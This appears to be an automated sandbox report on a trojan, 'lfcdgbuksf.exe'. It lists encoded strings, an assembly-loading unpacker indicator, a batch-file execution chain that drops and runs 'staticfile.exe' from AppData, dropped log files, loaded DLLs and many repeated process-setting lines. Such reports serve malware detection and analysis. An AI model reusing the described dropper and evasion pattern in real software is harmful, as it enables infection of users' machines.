                  Source: lfcdgbuksf.exe, 76n.csBase64 encoded string: 'kZlHmr+EXDctKNKP6g/pAaXKYEgInr7nJECCmeLdceCVDicxqqLjurdZo1rg/BX26evef9Xuw3gasL1YAoytpNDDu2I1zxcfKRBNXvT+OyGwNi1yWnTtaMkcjJKMtVlkfN3DOSyKF888N82wLPWErg==', 'kJwY3TIDYnabJUQV5Kbra8d1XfaRoTMgZwpoXtcXJxeM3LwzNKxCGQv6klCJjkyJ+JjPcZrZ2QXJaR/gO3ECtpqqxnzevc8J1TS7Q70f2mvg6aOkq7oO4903Ft48Q3+cj7pz0aN7UIppmoVk9e6QwyIxygxueqI34iv/37inGhA2En82CMtBfkdRmOo3f4Zn9JaHzWae7POC6pBY+IkmNQap5jpx5HbwmRz5dYS8Ae9Pjpk2Y0c3X0iw2Ed7hLLS'
                  Source: lfcdgbuksf.exe, 7YK.csBase64 encoded string: 'xp6e/TElTo6K9zbZrQpU+uj4dl+s8/67EQL7m338QvkAp6g4JTGFqxW9Kwbc78q5mWEwFKgClJqv+xlbGHdgpWPmOqEkZqWLjRSNOxGuUxOn/0CRe2trbUBON6tdiqTH5zBZjTSXh7PXJGKoue1cFvaP0b0Nor6Ubwg4SqubcLf4CTaOMY/tCKQhehVwhGEK9Kyy4d0J3YY5x/Z413S8Dl8RByVm7krBUrH5vpBAqm/h563pqQCttU67nQt9/odW21++cBb4kGfxEnwrCuH8ndKX6yxwSLkVxnrw1UO0Uaqk/Yj97lV2RKfIuI5AAyzFEP+ixt3/RDUKUzsCWAL8GVqI/NAY1wIrDZKuLfOxd0SIcGmKefGCAJXvRz7589MNiYutq13NO+xMyTc+hqlQcHsQLutvHWu+baTvzIAcmIGhRoNs2KCTFqR7fb9ZBSaxd+pX288Nr6A3Qj/Aqne31h9kjcesfB4b/anSnQvglSpDJIIj5G6X6gvi31aSi1md9yfL9TXxjYKIqigHiTfC3JgSbcGgsq5eN7SXjkWjBNw=', 'OD9FzlT6RlmjYkv1LxWg579EhOgUQmGG0hOTE5sG3ILCoDet2i0BnIDQE5hlE9poeft1VcwPFQnxw7adtxbsvFdre7PIXHB3dghIUnXavk6WeQeGfD1Ri62ZCBXYMo27'
                  Source: lfcdgbuksf.exe, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@10/21@0/1
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\ZFopJXMZ.logJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
                  Source: C:\Users\user\AppData\Local\staticfile.exeMutant created: \Sessions\1\BaseNamedObjects\Local\7a03fb45e1ca97b16588d3f108e53648f3d91c7e6cfbf7d76f10fd2dfc23d446
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\AppData\Local\Temp\csQgNwNy6MJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat"
                  Source: lfcdgbuksf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: lfcdgbuksf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                  Source: C:\Users\user\AppData\Local\staticfile.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: lfcdgbuksf.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile read: C:\Users\user\Desktop\lfcdgbuksf.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\lfcdgbuksf.exe "C:\Users\user\Desktop\lfcdgbuksf.exe"
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe"
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5hJc6iFcNs.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: dlnashext.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: wpdshext.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mmdevapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ksuser.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: avrt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: audioses.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: midimap.dllJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: lfcdgbuksf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: lfcdgbuksf.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: lfcdgbuksf.exeStatic file information: File size 1657344 > 1048576
                  Source: lfcdgbuksf.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x194200
                  Source: lfcdgbuksf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: lfcdgbuksf.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                  Source: lfcdgbuksf.exe, 857.cs.Net Code: _736
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B7F3CB9 push ebx; retf 0_2_00007FFD9B7F3CBA
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE83B4 push edi; retf 6_2_00007FFD9BBE83B2
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE8374 push edi; retf 6_2_00007FFD9BBE83B2
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE8334 push esp; retf 6_2_00007FFD9BBE8372
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE7DD8 push ds; retf 6_2_00007FFD9BBE7DE2
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\smdnokfM.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\DDWtiErR.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\vZNEzLck.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\AppData\Local\staticfile.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\MEQTIppb.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\eQsYbLKq.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\jDKXEIae.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\ZFopJXMZ.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\BRqdbrgY.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\hADxImWJ.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\EGcTfavm.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\YRkhYJRb.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\aIuPGtQu.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\vXIDvyqF.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\dNlyfpHV.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\ZFopJXMZ.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\DDWtiErR.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\vZNEzLck.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\dNlyfpHV.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\BRqdbrgY.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\hADxImWJ.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeFile created: C:\Users\user\Desktop\YRkhYJRb.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\jDKXEIae.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\aIuPGtQu.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\EGcTfavm.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\vXIDvyqF.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\eQsYbLKq.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\MEQTIppb.logJump to dropped file
                  Source: C:\Users\user\AppData\Local\staticfile.exeFile created: C:\Users\user\Desktop\smdnokfM.logJump to dropped file
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
